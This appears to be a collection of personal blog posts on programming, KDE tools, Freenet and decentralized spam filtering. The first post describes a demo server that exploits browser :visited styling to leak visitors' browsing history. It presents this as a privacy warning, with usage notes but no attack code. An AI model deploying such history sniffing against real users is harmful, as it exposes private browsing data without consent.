If you see http://blubber.blau as found, you're safe. If you don't see any links as found, you're likely to be safe. In any other case, everyone in the web can grab your history - if given enough time (a few minutes) or enough iframes (which check your history in parallel). This doesn't use Javascript.

It currently only checks for the 1000 or so most visited websites and doesn't keep any logs in files (all info is in memory and wiped on every restart), since I don't really want to create a full fledged history ripper but rather show how easy it would be to create one.

Besides: It does not need to be run in an iframe. Any Python-powered site could just run this test as regular part of the site while you browse it (and wonder why your browser has so much to do for a simple site, but since we’re already used to high load due to Javascript, who is going to care?). So don’t feel safe, just because there are no iframes. To feel and be safe, use one of the solutions from What the Internet knows about you.

Konqueror seems to be immune: It also (pre-)loads the "visited"-images from not visited links, so every page is seen as visited - which is the only way to avoid spreading my history around on the web and still providing “visited” image-hints in the browser!

Firefox 4.0.1 seems to be immune, too: It does not show any :visited-images, so the server does not get any requests.

So please don't let your browser load anything depending on the :visited state of a link tag! It shouldn't load anything based on internal information, because that always publicizes private information - and you don't know who will read it!

In short: Don't keep repeating Ennesbys Mistake:

  • Mistake: http://www.schlockmercenary.com/d/20071201.html

  • Effects: http://www.schlockmercenary.com/d/20071206.html

(comic strips not hosted here and not free licensed → copyright: Howard V. Tayler)

And to the Firefox developers: Please remove the optimization of only loading required css data based on the visited info! I already said so in a bug report, and since the bug isn't fixed, this is my way to put a bit of weight behind it. Please stop putting your users privacy at risk.

Usage:

  • python server.py
    start the server at port 8000. You can now point your browser to http://127.0.0.1:8000 to get sniffed :)

To get more info, just use ./server.py --help.

adapt plainnat bibtex natbib style to only show the url if no doi is available

Since the URL in a bibtex entry is typically just duplicate information when the entry has a DOI, I want to hide it.1

Here’s how:

diff -r 5b78f551d0a0 plainnatnoturl.bst
--- a/plainnatnoturl.bst    Tue Apr 04 10:45:08 2017 +0200
+++ b/plainnatnoturl.bst    Tue Apr 04 10:52:25 2017 +0200
@@ -1,5 +1,7 @@
-%% File: `plainnat.bst'
-%% A modification of `plain.bst' for use with natbib package 
+%% File: `plainnatnoturl.bst'
+%% A modification of `plain.bst' and `plainnat.bst' for use with natbib package 
+%% 
+%% From /usr/share/texmf-dist/bibtex/bst/natbib/plainnat.bst
 %%
 %% Copyright 1993-2007 Patrick W Daly
 %% Max-Planck-Institut f\"ur Sonnensystemforschung
@@ -285,7 +288,11 @@
 FUNCTION {format.url}
 { url empty$
     { "" }
-    { new.block "URL \url{" url * "}" * }
+    { doi empty$
+      { new.block "URL \url{" url * "}" * }
+      { "" }
+      if$
+    }
   if$
 }

Just put this next to your .tex file, add a header linking the doi

\newcommand*{\doi}[1]{\href{http://dx.doi.org/#1}{doi: #1}}

and use the bibliography referencing plainnatnoturl.bst

\bibliographystyle{plainnatnoturl}
\bibliography{YOURBIBFILE}

That’s it. Thanks to toliveira from tex.stackexchange!

Footnotes:

1

Also I’m scraping at my page limit and cutting a line for roughly every second entry helps a lot :)

complex number compiler and libc bugs (cexp+conj) on OSX and with the intel compiler (icc)

Today a bug in complex number handling surfaced in guile which only appeared on OSX.

This is a short note just to make sure that the bug is reported somewhere.

Test-code (written mostly by Mark Weaver who also analyzed the bug - I only ran the code on a few platforms I happened to have access to):

// test.c
// compile with gcc -O0 -o test test.c -lm
// or with icc -O0 -o test test.c -lm
#include <complex.h>
#include <stdio.h>

int
main (int argc, char **argv)
{
  double complex z = conj (1.0);
  double complex result;

  if (argc == 1)
    z = conj (0.0);

  result = cexp (z);

  printf ("cexp (%f + %f i) => %f + %f i\n",
          creal (z), cimag (z), creal (result), cimag (result));
  result = conj(result);
  printf ("conj(cexp (%f + %f i)) => %f + %f i\n",
          creal (z), cimag (z), creal (result), cimag (result));

  return 0;
}

As by the C-11 standard (pages 561 and 216) this should return:

cexp (0.000000 + -0.000000 i) => 1.000000 + -0.000000 i

conj(cexp (0.000000 + -0.000000 i)) => 1.000000 + 0.000000 i

Page 561:

— cexp(conj(z)) = conj(cexp(z)).

Page 216:

The conj functions compute the complex conjugate of z, by reversing the sign of its imaginary part.

On OSX it returns (compiled with GCC):

TODO: Check the second line!

cexp (0.000000 + -0.000000 i) => 1.000000 + 0.000000 i

With the intel compiler it returns:

cexp (0.000000 + 0.000000 i) => 1.000000 + 0.000000 i

conj(cexp (0.000000 + 0.000000 i)) => 1.000000 + 0.000000 i

In short: On OSX cexp seems broken. With the intel compiler conj seems broken.

icc --version
# => icc (ICC) 13.1.3 20130607
# => Copyright (C) 1985-2013 Intel Corporation.  All rights reserved.

The OSX compiler is GCC 4.8.2 from MacPorts.


[taylanub] ArneBab: You might want to add that compiler optimizations can result in cexp() calls where there are none (which is how this bug surfaced in our case).

[mark_weaver] cexp(z) = e^z = e^(a+bi) = e^a * e^(bi) = e^a * (cos(b) + i*sin(b))

[mark_weaver] for real 'b', e^(bi) is a point on the unit circle on the complex plane.

[mark_weaver] so cexp(bi) can be used to compute cos(b) and sin(b) simultaneously, and probably faster than calling 'sin' and 'cos' separately.

minimal Python script

Over the years I found a few things which in my opinion are essential for any Python script:

  • A description,
  • useful logging
  • argument parsing and
  • doctests

Everything in this setup is low-overhead and available from Python 2.6 to 3.x, so you can use it to start any kind of project.

# encoding: utf-8

"""Minimal setup for a Python script.

No project should start without this.
"""

import argparse # for Python <2.6 use optparse
# setup sane logging. It tells you why, where and when something was
# logged, so you can jump to the source line right away.
import logging
logging.basicConfig(level=logging.WARNING,
                    format=' [%(levelname)-7s] (%(asctime)s) %(filename)s::%(lineno)d %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')


def main():
    """The main entry point."""
    pass


# output test results as base60 number (for aesthetics)
def numtosxg(n):
    CHARACTERS = ('0123456789'
                  'ABCDEFGHJKLMNPQRSTUVWXYZ'
                  '_'
                  'abcdefghijkmnopqrstuvwxyz')
    s = ''
    if not isinstance(n, int) or n == 0:
        return '0'
    while n > 0:
        n, i = divmod(n, 60)
        s = CHARACTERS[i] + s
    return s


def _test():
    """  run doctests, can include setup. Complex example:
    >>> import sys
    >>> handlers = logging.getLogger().handlers # to stdout
    >>> logging.getLogger().handlers = []
    >>> logging.getLogger().addHandler(
    ...     logging.StreamHandler(stream=sys.stdout))
    >>> logging.warn("test logging")
    test logging
    >>> logging.getLogger().handlers = handlers
    """
    from doctest import testmod
    tests = testmod()
    if not tests.failed:
        return "^_^ ({})".format(numtosxg(tests.attempted))
    else: return ":( "*tests.failed

# keep argument setup and parsing together

parser = argparse.ArgumentParser(description=__doc__.splitlines()[0])
parser.add_argument("arguments", metavar="args", nargs="*",
                    help="Commmandline arguments")
parser.add_argument("--debug", action="store_true",
                    help="Set log level to debug")
parser.add_argument("--info", action="store_true",
                    help="Set log level to info")
parser.add_argument("--quiet", action="store_true",
                    help="Set log level to error")
parser.add_argument("--test", action="store_true",
                    help="Run tests")


# add a commandline switch to increase the log-level when running this
# script standalone. --test should run the tests.
if __name__ == "__main__":
    args = parser.parse_args()
    if args.debug:
        logging.getLogger().setLevel(logging.DEBUG)
    elif args.info:
        logging.getLogger().setLevel(logging.INFO)
    elif args.quiet:
        logging.getLogger().setLevel(logging.ERROR)
    if args.test:
        print(_test())
    else:
        main()

pyRad - a wheel type command interface for KDE

Arrrrrr! Ye be replacin' th' walk th' plank alt-tab wi' th' keelhaulin' pirate wheel, matey! — Lacrocivious

pyRad is a wheel type command interface for KDE1, designed to appear below your mouse pointer at a gesture.

install | setup | usage and screenshots | download and sources

pyRad command wheel

Install

in any distro

  • Get Python.
  • call easy_install pyRadKDE in any shell.
  • Test it by calling pyrad.py.
  • This should automatically pull in pyKDE4. If it doesn’t, you need to install that seperately.
  • Visual icon selection requires the kdialog program (a standard part of KDE).

  • For a "live" version, just clone the pyrad Mercurial repo and let KDE run "path/to/repo/pyrad.py" at startup. You can stop a running pyrad via pyrad.py --quit. pyrad.py --help gives usage instructions.

In Gentoo

  • emerge -a kde-misc/pyrad

In unfree systems (like MacOSX and Windows)

  • I have no clue since I don’t use them. You’ll need to find out yourself or install a free system. Examples are Kubuntu for beginners and Gentoo for convenient tinkering. Both run GNU/Linux.

Setup

  • Run /usr/bin/pyrad.py. Then add it as script to your autostart (systemsettings→advanced→autostart). You can now use Alt-F6 and Meta-F6 to call it.

Mouse gesture (optional)

  • Add the mouse gesture in systemsettings (systemsettings→shortcuts) to call D-Bus: Program: org.kde.pyRad ; Object: /MainApplication ; Function: newInstance (you might have to enable gestures in the settings, too - in the shortcuts-window you should find a settings button).

  • Alternately set the gesture to call the command dbus-send --type=method_call --dest=org.kde.pyRad /MainApplication org.kde.KUniqueApplication.newInstance.

Customize the wheel

Customize the menu by editing the file "$HOME/.pyradrc" or middle-clicking (add) and right-clicking (edit) items.

Usage and screenshots

To call pyRad and see the command wheel, you simply use the gesture or key you assigned.

pyRad command wheel

Then you can activate an action with a single left click. Actions can be grouped into folders. To open a folder, you also simply left-click it.

Also you can click the keyboard key shown at the beginning of the tooltip to activate an action (hover the mouse over an icon to see the tooltip).

To make the wheel disappear or leave a folder, click the center or hit the key 0. To just make it disappear, hit escape.

For editing an action, just right click it, and you’ll see the edit dialog.

pyRad edit dialog

Each item has an icon (either an icon name from KDE or the path to an icon) and an action. The action is simply the command you would call in the shell (only simple commands, though, no real shell scripting or glob).

To add a new action, simply middle-click the action before it. The wheel goes clockwise, with the first item being at the bottom. To add a new first item, middle-click the center.

To add a new folder (or turn an item into a folder), simply click on the folder button, say OK and then click it to add actions in there.

See it in action:

pyRad in action (screenshot)

download and sources

pyRad is available from

PS: The name is a play on ‘python’, ‘Rad’ (german for wheel) and pirate :-)

PPS: KDE, K Desktop Environment and the KDE Logo are trademarks of KDE e.V.

PPPS: License is GPL+ as with almost everything on this site.Arrrrrr! Ye be replacin' th' walk th' plank alt-tab wi' th' keelhaulin' pirate wheel, matey! Arrrrr! → http://draketo.de/light/english/pyrad


  1. powered by KDE 

AnhangGröße
pyrad-0.4.3-screenshot.png26.67 KB
pyrad-0.4.3-screenshot-edit-action.png36.28 KB
pyrad-0.4.3-screenshot-edit-folder.png39.18 KB
pyrad-0.4.3-screenshot2.png29.03 KB
pyrad-0.4.3-screenshot3.png27.59 KB
powered_by_kde_horizontal_190.png11.96 KB
pyrad-0.4.3-fullscreen.png913.3 KB
pyrad-0.4.3-fullscreen-400x320.png143.69 KB
pyrad-0.4.4-screenshot-edit-action.png40.94 KB

pyRad is now in Gentoo portage! *happy*

My wheel type command interface pyRad just got included in the official Gentoo portage-tree!

So now you can install it in Gentoo with a simple emerge kde-misc/pyrad.

pyRad command wheel

Many thanks go to the maintainer Andreas K. Hüttel (dilfridge) and to jokey and Tommy[D] from the Gentoo sunrise project (wiki) for providing their user-overlay and helping users with creating ebuilds as well as Arfrever, neurogeek, floppym from the Gentoo Python-Herd for helping me to clean up the ebuild and convert it to EAPI 3!

shell basics (bash)

These are the notes to a short tutorial I gave to my working group as part of our groundwork group meetings. Some parts here require GNU Bash.

1 Outline

1.1 Outline

  • user-output: echo
  • pipes: |, xargs, - (often stdin)
  • text-processing: cat/tac, sed, grep, cut, head/tail
  • variables (foo=1; echo ${foo})
  • subshell: $(command)
  • loops (for; do; done) (while; do; done)
  • conditionals (if; then; fi)
  • scripts: shebang
  • return values: $?
  • script-arguments: $1, $#, $@ and getopt
  • command chaining: ;, &, && and ||
  • functions and function-arguments
  • math: $((1+2))
  • help: man and info

2 Notes

2.1 user-output

echo "foobar"
echo foobar
echo echo # second echo not executed but printed!

2.2 Pipes

  • basic way of passing info between programs
echo foobar | xargs echo
# same output as
echo foobar
echo foo > test.txt # pipe into file, replacing the content
echo bar >> test.txt # append to file
# warning: 
cat test.txt > test.txt # defined as generating an empty file!

2.3 text-processing

echo foobar | sed s/foo.*/foo/ | xargs echo
# same output as 
echo foo
echo foo | grep bar # empty
echo foobar | grep oba # foobar, oba higlighted

2.4 Variables

foo=1 # no spaces around the equal sign!
echo ${foo} # "$foo" == "1", "$foobar" == "", "${foo}bar" == "1bar"

2.5 Subshells

echo $(echo foobar)
# equivalent to
echo foobar | xargs echo

2.6 loops

for i in a b c; do 
    echo $i
done
# ; can replace a linebreak
for i in a b c; do echo $i; done
for i in {1..5}; do # 1 2 3 4 5
    echo $i
done
while true; do 
    break; 
done
# break: stop
# continue: start the loop again

2.7 Quoting

foo=1
echo "${foo}" # 1
echo '${foo}' # ${foo} <- literal string
for i in "a b c"; do # quoted: one argument
    echo ${i}; 
done 
# => a b c
for i in a b c; do # unquoted: whitespace is separator!
    echo ${i}; 
done 
# a
# b
# c

2.8 conditionals

# string equality
a="foo"
b="bar"
if [[ x"${a}" == x"${b}" ]] ; then
    echo a
else
    echo b
fi
# other tests
if test -z ""; then 
    echo empty
fi
if [ -z "" ]; then
    echo same check
fi
if [ ! -z "not empty" ]; then
    echo inverse check
fi
if test ! -z "not empty"; then
    echo inverse check with test
fi
if test 5 -ge 2; then
    echo 5 is greater or equal 2
fi

also check test 1 -eq 1, and info test.

2.9 scripts: shebang/hashbang

#!/usr/bin/env bash
echo "Hello World"
chmod +x hello.sh
./hello.sh

2.10 Scripts: return value

echo 1
echo $? # 0: success
grep 1 /dev/null # fails
echo $? # 1: failure
exit 0 # exit a script with success value (no further processing of the script)
exit 1 # exit with failure (anything but 0 is a failure)

2.11 define shell arguments with getopt

# info about this script
version="shell option parsing example 0.1"
# check for the kind of getopt
getopt -T > /dev/null
if [ $? -eq 4 ]; then
    # GNU enhanced getopt is available
    eval set -- `getopt --name $(basename $0) --long help,verbose,version,output: --options hvo: -- "$@"`
else
    # Original getopt is available
    eval set -- `getopt hvo: "$@"`
fi

# # actually parse the options
# PROGNAME=`basename $0`
# ARGS=`getopt --name "$PROGNAME" --long help,verbose,version,output: --options hvo: -- "$@"`
# if [ $? -ne 0 ]; then
#   exit 1
# fi
# eval set -- $ARGS

# default options
HELP=no
verbose=no
VERSION=no
OUTPUT=no

# check, if the default wisp exists and can be executed. If not, fall
# back to wisp.py (which might be in PATH).
if [ ! -x $WISP ]; then
    WISP="wisp.py"
fi

while [ $# -gt 0 ]; do
    case "$1" in
        -h | --help)        HELP=yes;;
        -o | --output)      OUTPUT="$2"; shift;;
        -v | --verbose)     VERBOSE=yes;;
        --version)          VERSION=yes;;
        --)              shift; break;;
    esac
    shift
done
# all other arguments stay in $@
<<using-options>>

2.12 act on options

# Provide help output

if [[ $HELP == "yes" ]]; then
    echo "$0 [-h] [-v] [-o FILE] [- | filename]
        Show commandline option parsing.

        -h | --help)        This help output.
        -o | --output)      Save the executed wisp code to this file.
        -v | --verbose)     Provide verbose output.
        --version)          Print the version string of this script.
"
    exit 0
fi

if [[ x"$VERSION" == x"yes" ]]; then
    echo "$version"
    exit 0 # script ends here
fi

if [[ ! x"$OUTPUT" == x"no" ]]; then
    echo writing to $OUTPUT
fi

# just output all other arguments
if [ $# -gt 0 ]; then
    echo $@
fi

2.13 default help output formatting

prog [OPTIONAL_FLAG] [OPTIONAL_ARGUMENT VALUE] REQUIRED_ARGUMENT...
# ... means that you can specify something multiple times
# short and long options
prog [-h | --help] [-v | --verbose] [--version] [-f FILE | --file FILE] 
# concatenated short options
hg help [-ec] [THEMA] # hg help -e -c == -ec

2.14 Common parameters for commands

prog --help # provide help output. Often also -h
prog --version # version of the program. Often also -v
prog --verbose # often to give more detailed information. Also --debug

By convention and the minimal GNU standards

2.15 Command chaining

echo 1 ; echo 2 ; echo 3 # sequential
echo 1 & echo 2 & echo 3 # backgrounding: possibly parallel

grep foo test.txt && echo foo is in test.txt # conditional: Only if grep is successful
grep foo test.txt || echo foo is not in test.txt # conditional: on failure

2.16 Math (bash-builtin)

echo $((1+2)) # 3
a=2
b=3
echo $((a*b)) # 6
echo $((a**$(echo 3))) # 8

2.17 help

man [command]
info [topic]
info [topic subtopic]
# emacs: C-h i

more convenient info:

function i()
{
    if [[ "$1" == "info" ]]; then
        info --usage -f info-stnd
    else
        # check for usage from fast info, if that fails check man and if that also fails, just get the regular info page.
        info --usage -f "$@" 2>/dev/null || man "$@" || info "$@"
    fi
}

turn files with wikipedia syntax to html (simple python script using mediawiki api)

I needed to convert a huge batch of mediawiki-files to html (had a 2010-03 copy of the now dead limewire wiki lying around). With a tip from RoanKattouw in #mediawiki@freenode.net I created a simple python script to convert arbitrary files from mediawiki syntax to html.

Usage:

  • Download the script and install the dependencies (yaml and python 3).
  • ./parse_wikipedia_files_to_html.py <files>

This script is neither written for speed or anything (do you know how slow a webrequest is, compared to even horribly inefficient code? …): The only optimization is for programming convenience — the advantage of that is that it’s just 47 lines of code :)

It also isn’t perfect: it breaks at some pages (and informs you about that).

It requires yaml and Python 3.x.

#!/usr/bin/env python3

"""Simply turn all input files to html. 
No errorchecking, so keep backups. 
It uses the mediawiki webapi, 
so you need to be online.

Copyright: 2010 © Arne Babenhauserheide
License: You can use this under the GPLv3 or later, 
         if you add the appropriate license files
         → http://gnu.org/licenses/gpl.html
"""

from urllib.request import urlopen
from urllib.parse import quote
from urllib.error import HTTPError, URLError
from time import sleep
from random import random
from yaml import load
from sys import argv

mediawiki_files = argv[1:]

def wikitext_to_html(text):
    """parse text in mediawiki markup to html."""
    url = "http://en.wikipedia.org/w/api.php?action=parse&format=yaml&text=" + quote(text, safe="") + " "
    f = urlopen(url)
    y = f.read()
    f.close()
    text = load(y)["parse"]["text"]["*"]
    return text

for mf in mediawiki_files:
    with open(mf) as f:
        text = f.read()
    HTML_HEADER = "<html><head><title>" + mf + "</title></head><body>"
    HTML_FOOTER = "</body></html>"
    try: 
        text = wikitext_to_html(text)
        with open(mf, "w") as f:
            f.write(HTML_HEADER)
            f.write(text)
            f.write(HTML_FOOTER)
    except HTTPError:
        print("Error converting file", mf)
    except URLError:
        print("Server doesn’t like us :(", mf)
        sleep(10*random())
    # add a random wait, so the api server doesn’t kick us
    sleep(3*random())
AnhangGröße
parse_wikipedia_files_to_html.py.txt1.47 KB

Freenet

When free speech dies, we need a place to organize.

Freenet is a censorship resistant, distributed p2p-publishing platform.

Too technical? Let’s improve that: Freenet is the internet's last, best hope for Freedom. Join now:

freenetproject.org

It lets you anonymously share files, browse and publish “freesites”, chat on forums and even do microblogging, using a generic Web of Trust, shared by different plugins, to avoid spam. For really careful people it offers a “darknet” mode, where users only connect to their friends, with which it is very hard to detect that they are running freenet.

The overarching design goal of freenet is to make censorship as hard as technically possible. That’s the reason for providing anonymity (else you could be threatened with repercussions - as seen in the case of the wikileaks informer from the army in the USA), building it as a decentral network (else you could just shut down the central website, as people tried with wikileaks), providing safe pseudonyms and caching of the content on all participating nodes (else people could censor by spamming or overloading nodes) and even the darknet mode and enhancements in usability (else freenet could be stopped by just prosecuting everyone who uses it, or it would reach too few people to be able to counter censorship in the open web).

I don’t know anymore what triggered my use of freenet initially, but I know all too well what keeps me running it instead of other anonymizers:

I see my country (Germany) turning more and more into a police-state, starting with attacks on p2p, continuing with censorship of websites (where infrastructure created to block child porn is now used to block websites of climate activists)* and leading into directions I really don’t like.

And in case the right for freedom of speech dies, we need a place where we can organize to get it back and fight for the rights laid out in our constitution (the Grundgesetz).

When free speech dies, we need a place to organize.

And that’s what Freenet is to me.

A technical way to make sure we can always organize acting by section 20 of our constitution (german link): the right to oppose everyone who wants to abolish our constitutional order.

PS: New entries on my site are also available in freenet (via freereader: downloads RSS feeds and republishes them in freenet).

PPS: If you like this text, please redent/retweet the associated identi.ca/twitter notices so it spreads:

50€ for the Freenet Project - and against censorship

As I pledged1, I just donated to freenet 50€ of the money I got back because I cannot go to FilkCONtinental. Thanks go to Nemesis, a proud member of the “FiB: Filkers in Black” who will take my place at the Freusburg and fill these old walls with songs of stars and dreams - and happy laughter.

It’s a hard battle against censorship, and as I now had some money at hand, I decided to do my part (freenetproject.org/donate.html).


  1. The pledge can be seen in identi.ca and in a Sone post in freenet (including a comment thread; needs a running freenet node (install freenet in a few clicks) and the Sone plugin). 

A bitcoin-marketplace using Freenet?

A few days ago, xor, the developer of the Web of Trust in Freenet got in contact with the brain behind the planned Web of Trust for Openbazaar, and toad, the former maintainer of Freenet questioned whether we would actually want a marketplace using Freenet.

I took a a few days to ponder the question, and I think a marketplace using Freenet would be a good idea - for Freenet as well as for society.

Freenet is likely the most secure way for implementing a digital market, which means it can work safely for small sums, but not for large ones - except if you can launder huge amounts of digital money. As such it is liberating for small people, but not for syndicates. For example a drug cartel needs to be able to turn lots of money into clean cash to pay henchmen abroads. Since you can watch bitcoin more easily than cash and an anonymous network makes it much harder to use scare-tactics against competing sellers, moving the marketplace from the street to the internet weakens syndicates and other organized crime by removing part of their options for creating a monopoly by force.

If a bitcoin marketplace with some privacy for small-scale users should become a bigger problem than the benefit it brings by weakening organized crime, any state or other big player can easily force the majority of users to reveal their identities by using the inherent tracability of bitcoin transactions.

Also the best technologies in freenet were developed (or rather: got to widespread use), because it had to actually withstand attacks.

Freenet as marketplace with privacy for small people equivalent to cash-payments would also help improve its suitability for whistleblowers - see hiding in the forest: A better alternative.

For free speech this would also help, because different from other solutions, freenet has the required properties for that: a store with lifetime depending on the popularity of content, not the power of the publisher, which provides DoS-resistant hosting without the need to have a 24/7 server, stable and untraceable pseudonyms (ignoring fixable attack-vectors) and an optional friend-to-friend darknet.

In short: A decentralized ebay-killer would be cool and likely beneficial to Freenet and Free Speech without bringing actual benefit for organized crime.

Also this might be what is needed to bring widespread darknet adoption.

And last but not least, we would not be able to stop people from implementing a marketplace over freenet: Censorship resistance also means resistance against censorship by us.

Final note: Openbazaar is written in Python and Freenet has decent Python Bindings (though they are not beautiful everywhere), so it should not be too hard to use it for Openbazaar. A good start could be the WoT-code written for Infocalypse in last years GSoC: Web of Trust integration as well as private messaging.

AnhangGröße
freenet_logo.png16.72 KB
freenet-banner.png3.39 KB

A deterministic upper bound for the network load of the fully decentralized Freenet spam filter

Goal: Improve the decentralized spam filter in Freenet (WoT) to have deterministic network load, bounded to a low, constant number of subscriptions and fetches.

This article provides calculations which show that decentralized spam filtering with privacy through pseudonyms can scale to communication systems that connect all of humanity. It is also applicable to other systems than Freenet, see use in other systems.

Originally written as a comment to bug 3816. The bug report said "someone SHOULD do the math". I then did the math. Here I’m sharing the results.

Useful prior reading is Optimizing a distributed spam filter for Freenet.

This proposal has two parts:

  1. Ensuring an upper bound on the network cost, and
  2. Limiting the cost due to checking stale IDs.

Slang

  • ID, "identity" or "pseudonym" is a user account. You can have multiple.
  • OwnID is one of your own identities, a pseudonym you control.
  • Trust is a link from one ID (a) to another ID (b). It has a numerical value.
    • Positive values mean that (a) considers (b) to be a constructive contributor.
    • Negative values mean that (a) thinks that (b) is trying to disrupt communication.
  • Key is an identifier you can use as part of a link to download data. Every ID has one key.
  • Editions are the versions of keys. They are increased by one every time a key is updated.
  • Fetch means to download some data from some key for some edition.
  • Subscription is a lightweight method to get informed if a key was updated to a new edition.
  • Edition hints are part of an ID. They show for each trusted ID (b) which edition of it was last seen by the trusting ID (a).
  • The rank of an ID describes the number of steps needed to get from your OwnID to that ID when following trust paths.

Variables

  • N the number of identities the OwnID gave positive trust. Can be assumed to be bounded to 150 active IDs (as by Dunbar’s number).⁰
  • M a small constant for additional subscriptions, i.e. 10.
  • F a small constant for additional fetches per update, i.e. 10.

⁰: https://en.wikipedia.org/wiki/Dunbar's_number - comment by bertm: that assumes all statements of "OwnID trusts ID to not be a spammer" to be equivalent to "OwnID has a stable social relationship with ID". I'm not quite sure of that equivalence. That said, for purposes of analysis, we can well assume it to be bounded by O(1).

Limit network load with a constant upper bound

Process

Subscribe to all rank 1 IDs (which have direct trust from your OwnID). These are the primary subscriptions. There are N primary subscriptions.

All the other IDs are split into two lists: rank2 (secondary IDs) and rank3+ (three or more steps to reach them). Only a subset of those get subscriptions, and the subset is regularly changed:

  • Subscribe to the M rank2 IDs which were most recently updated. These have the highest probability of being updated again. The respective list must be updated whenever a rank2 ID is fetched successfully (the ordering might change).
  • Subscribe to the M rank3+ IDs which were most recently updated. The respective list must be updated whenever a rank3+ ID is fetched successfully (the ordering might change).
  • Subscribe to M rank2 IDs chosen at random (secondary subscriptions). When a secondary or random subscription yields an update, replace it with another ID of rank2, chosen at random.
  • Subscribe to M IDs of rank 3 or higher chosen at random (random subscriptions). When a random subscription yields an update, replace it with another rank3+ ID, chosen at random.

Also replace one of the randomly chosen rank2 and rank3+ subscription every hour. This ensures that WoT will always eventually see every update.

If any subscription yields an update, download its key and process all edition hints. Queue these as fetches in separate queues for rank1 (primary), rank2 (secondary), and rank3+ (random), and process them independently.

At every update of a subscription (rank1, rank2, or rank3+), choose F fetches from the respective edition hint fetch queue at random and process them. This bounds the network load to ((N × F) + (4M × F)) × update frequency.

These fetches and subscriptions must be deduplicated: If we already have a subscription, there’s no use in starting a fetch, since the update will already have been seen.

Calculating the upper bound of the cost

To estimate an upper bound for the fetch frequency, we can use the twitter frequency, which is about 5 tweets per day on average and 10 to 50 for people with many followers¹ (those are more likely to be rank1 IDs of others).

There are two possible extremes: Very hierarchic trust structure and egalitarian trust structure. Reality is likely a power-law structure.

  • In a hierarchic trust structure, we can assume that rank1 or rank2 IDs (trustee subscriptions) are all people with many followers, so we use 22 updates per day (as by ¹).
  • In an egalitarian trust structure we can assume 5 updates per day (as by ¹).

For high frequency subscriptions (most recently updated) we can assume 4 updates per hour for 16 hours per day, so 64 updates per day.⁰ For random subscriptions we can assume 5 updates per day (as by ¹).

¹: http://blog.hubspot.com/blog/tabid/6307/bid/4594/Is-22-Tweets-Per-Day-the-Optimum.aspx ← on the first google page, not robust, but should be good enough for this usecase.

((N × F) + (M × F)) × trustee update frequency + 2M × F × high update frequency + 2M × F × random update frequency.

For a very hierarchic WoT (primaries are very active) this gives the upper bound:

= (150 × 10 × 22) + (10 × 10 × 22) + (10 × 10 × 64) + (2 × 10 × 10 × 5) + (10 × 10 × 64)
= (1500 × 22) + (100 × 22) + (100 × 64) + (100 × 5) + (100 × 64)
= 33000 + 2200 + 6400 + 500 + 6400 # primary triggered + random rank2 + active rank2 + random rank3+ + active rank3+
= 48500 fetches per day
~ 34 fetches per minute.

For an egalitarian trust structure (primaries have average activity) this gives the upper bound:

= (150 × 10 × 5) + (10 × 10 × 5) + (10 × 10 × 64) + (10 × 10 × 5) + (10 × 10 × 64)
= (1500 × 5) + (100 × 5) + (100 × 64) + (100 × 5) + (100 × 64)
= 7500 + 500 + 6400 + 500 + 6400 # primary triggered + random rank2 + active rank2 + random rank3+ + active rank3+
= 21300 fetches per day
~ 15 fetches per minute.

This gives a plausible upper bound of the network load per day from this scheme, assuming a very centralized WoT. The upper bound for a very hierarchic trust structure is dominated by the primary subscriptions. The upper bound for an egalitarian trust structure is dominated by the primary subscriptions and the high frequency subscriptions.

The rank2 subscriptions and the random subscriptions together make up about 5% of the network load. They are needed to guarantee that the WoT always eventually converges to a globally consistent view.

One fetch for an ID transfers about 1KiB data. For a hierarchic WoT (one fetch per two seconds) this results in a maximum bandwidth consumption on a given node of 1KiB/s × hops. This is about 5KiB/s for the average of 5 hops — slightly higher than our minimum bandwidth. For an egalitarian WoT this results in a maximum bandwidth consumption on a given node of 0.5KiB/s × hops. This is about 2.5KiB/s for the average of 5 hops — 60% of our minimum bandwidth. The real bandwidth requirement should be lower, because IDs are cached very well.

The average total number of subscriptions to active IDs should be bounded to 190.

⁰: The cost of active IDs might be overestimated here, because WoT has an upper bound of one update per hour. In this case the cost of this algorithm would be reduced by about 30% for the egalitarian structure and by about 10% for the hierarchic structure.

prune subscriptions to stale IDs to improve the rank2+ update detection delay to (less than) O(N), with N the known active IDs

The process to check IDs with rank >= 2 can be improved from essentially checking them at random (with the real risk of missing IDs — there is no guarantee to ever check them all, not even networkwide), to having each active ID check all IDs in O(N) (with N the number of of IDs).

Process

When removing a random subscription to an ID with rank2 or higher, with 50% probability add the ID+currentversion to a blocklist which avoids processing this same ID with this or a lower version again and prune it from the WoT.¹

When receiving a version hint from another ID with a higher version than the one which is blocked, the ID is removed from the blocklist.

The total cost in memory is on the order of the number of old IDs already checked, bounded to O(N), the number of Identities.

¹: Pruning the ID from WoT is not strictly necessary on the short term. However on the long term (a decade and millions of users), we must remove information.

Expected effect

Assume that 9k of the 10k IDs in WoT are stale (a reasonable assumption, because only about 300 IDs are inserted from an up to date version of WoT right now).

When replacing one random rank2 and one random rank3+ subscription per hour, that yields about 16k subscription replacements per year, or (in a form which simplifies the math) about two replacements per ID in the WoT.

Looking at only a single ID:

For the first replacement there is a 90% probability that the ID in question is stale, and a 50% probability that it will be put on the blocklist if it is stale, which yields a combined 45% probability that the number of stale IDs decreases by one. In other words, it takes on average 2.2 steps to remove the first stale ID from the IDs to check.

As a rough estimate, for 10 IDs it would take 15 steps to prune out 5 of the 9 stale IDs. Scaling this up should give an estimation of the time required for 9k IDs. So after about 15k steps (one year) half the stale IDs should be on the blocklist.

Looking at the whole network

For a given stale ID, after one year there is roughly a 50% chance that it is on the blocklist of a given active ID. But the probability that it is on the blocklist of every active ID is just about 0.5k, with k the number of active IDs. So when there is an update to this previously stale ID, it is almost certain that some ID will see it and remove it from the blocklists of most other IDs within O(N) steps by providing an edition hint (this will accelerate as more stale IDs are blocked).

Rediscovering inactive IDs when they return

I am sure that there is a beautiful formula to calculate exactly the proportion of subscriptions to stale IDs we’ll have with this algorithm when it entered a steady state, and the average discovery time for a previously stale ID to be seen networkwide again when it starts updating again. To show that this algorithm should work, we only need a much simpler answer, though:

How long will it take an ID which was inactive for 10 years to be seen networkwide again (if its direct trusters are all inactive, else the primary subscriptions would detect and spread its update within minutes)?

After 10 years, the ID will be on the blocklist of 99.9% of the IDs. In a network with 10k active IDs, that means that only about 10 IDs did not block it yet¹. Every year there is a 50% probability for each of the IDs that the update will be seen.

Therefore detection of the update to an ID which was inactive for 10 years and whose direct trusters are all inactive will take about 10 weeks. Then the update should spread rapidly via edition hints.

